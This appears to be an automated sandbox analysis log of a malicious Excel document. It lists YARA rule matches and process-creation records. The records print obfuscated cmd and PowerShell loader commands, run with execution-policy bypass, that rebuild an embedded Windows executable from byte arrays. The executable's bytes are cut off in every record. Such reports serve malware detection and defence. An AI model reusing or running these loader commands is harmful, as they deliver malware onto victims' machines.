Source: 00000005.00000002.1636004810.01A69000.00000004.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score = |
Source: 00000005.00000002.1638447073.04EE0000.00000004.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score = |
Source: 00000005.00000002.1635995960.01A60000.00000004.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score = |
Source: 00000005.00000002.1634369984.00150000.00000004.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score = |
Source: 00000005.00000002.1634433896.00190000.00000004.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score = |
Source: 00000005.00000002.1634948704.011C0000.00000004.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score = |
Source: 00000005.00000002.1634387196.00160000.00000008.sdmp, type: MEMORY | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 00000005.00000002.1634303771.000D0000.00000008.sdmp, type: MEMORY | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 00000005.00000002.1638385697.04350000.00000004.sdmp, type: MEMORY | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 00000005.00000002.1638206829.03EE0000.00000008.sdmp, type: MEMORY | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 00000005.00000002.1635853654.01920000.00000002.sdmp, type: MEMORY | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 00000005.00000002.1634554312.00220000.00000008.sdmp, type: MEMORY | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 00000005.00000002.1636329423.01D34000.00000004.sdmp, type: MEMORY | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 5.2.powershell.exe.4350000.5.unpack, type: UNPACKEDPE | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 5.2.powershell.exe.d0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 5.2.powershell.exe.d0000.0.unpack, type: UNPACKEDPE | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 5.2.powershell.exe.4350000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 5.2.powershell.exe.220000.2.unpack, type: UNPACKEDPE | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 5.2.powershell.exe.160000.1.unpack, type: UNPACKEDPE | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 5.2.powershell.exe.160000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 5.2.powershell.exe.1920000.3.unpack, type: UNPACKEDPE | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 5.2.powershell.exe.1920000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 5.2.powershell.exe.220000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 5.2.powershell.exe.3ee0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 5.2.powershell.exe.3ee0000.4.unpack, type: UNPACKEDPE | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding | |
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9 | |
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c%sUG% | |
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) ) | |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9 | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c%sUG% | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) ) | Jump to behavior |
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9 | |
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9 | |
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9 | |
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) ) | |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9 | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9 | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9 | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) ) | Jump to behavior |
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9 | |
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) ) | |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9 | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) ) | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
